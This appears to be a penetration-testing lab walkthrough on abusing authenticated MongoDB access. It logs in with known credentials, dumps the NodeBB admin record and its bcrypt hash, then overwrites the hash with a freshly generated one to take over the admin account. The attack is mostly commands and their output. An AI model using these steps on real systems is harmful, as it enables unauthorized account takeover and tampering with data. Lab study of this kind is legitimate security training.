Authenticated MongoDB

With valid credentials we can overwrite databases and chage passwords and configuration for other services that are around. This could be generating a new htapssword for webdav or nodebb.

┌──(kali㉿kali)-[~]
└─$ mongo mongodb://admin:monkey13@192.168.120.186:27017/
MongoDB shell version v4.2.13
connecting to: mongodb://192.168.120.186:27017/?compressors=disabled&gssapiServiceName=mongodb
Implicit session: session { "id" : UUID("42164b37-99dd-429d-91fc-65cc46e0240a") }
MongoDB server version: 4.0.22
...
---

> show databases
admin   0.000GB
config  0.000GB
local   0.000GB
nodebb  0.000GB
>

> use nodebb
switched to db nodebb
> db.objects.find({ _key: /^user:1$/ })
{ "_id" : ObjectId("6017626e253f4a61ea72a355"), "_key" : "user:1", "email" : "admin@tico.offsec", "joindate" : 1612145262550, "lastonline" : 1612146689780, "status" : "online", "uid" : 1, "username" : "admin", "userslug" : "admin", "password" : "$2a$12$T3BIimnZgfw60c12wFA99.MbugSdE0hfl/SSCYFZJ7jTVHe5PGGB6", "groupTitle" : "[\"administrators\"]", "topiccount" : 1, "postcount" : 1, "lastposttime" : 1612145263314 }

We see a single record in the collection, which belongs to the default admin user. We need to generate a new salted password hash to replace the password field in the record. We can do that with the htpasswd utility by generating a new bcrypt hash of the password password.

┌──(kali㉿kali)-[~]
└─$ htpasswd -bnBC 12 "" password            
:$2y$12$6.8Es6W3Cyc0en31K4inBef3mCoJaDo2lJ6biXdUmKXfrsSqlfgsW

Before using it, however, we first need to strip off the leading :.

┌──(kali㉿kali)-[~]
└─$ htpasswd -bnBC 12 "" password | tr -d ':'
$2y$12$LMqnkbq1FpTnOzAWTgizbugAOpGJaKl0h7PVHvDraW9e0wK2SR7Zu

Next, we'll overwrite the target password field with our newly generated hash.

> db.objects.update({ _key: /^user:1$/ }, { $set: { password: "$2y$12$LMqnkbq1FpTnOzAWTgizbugAOpGJaKl0h7PVHvDraW9e0wK2SR7Zu" }})
WriteResult({ "nMatched" : 1, "nUpserted" : 0, "nModified" : 1 })
> exit
bye

┌──(kali㉿kali)-[~]
└─$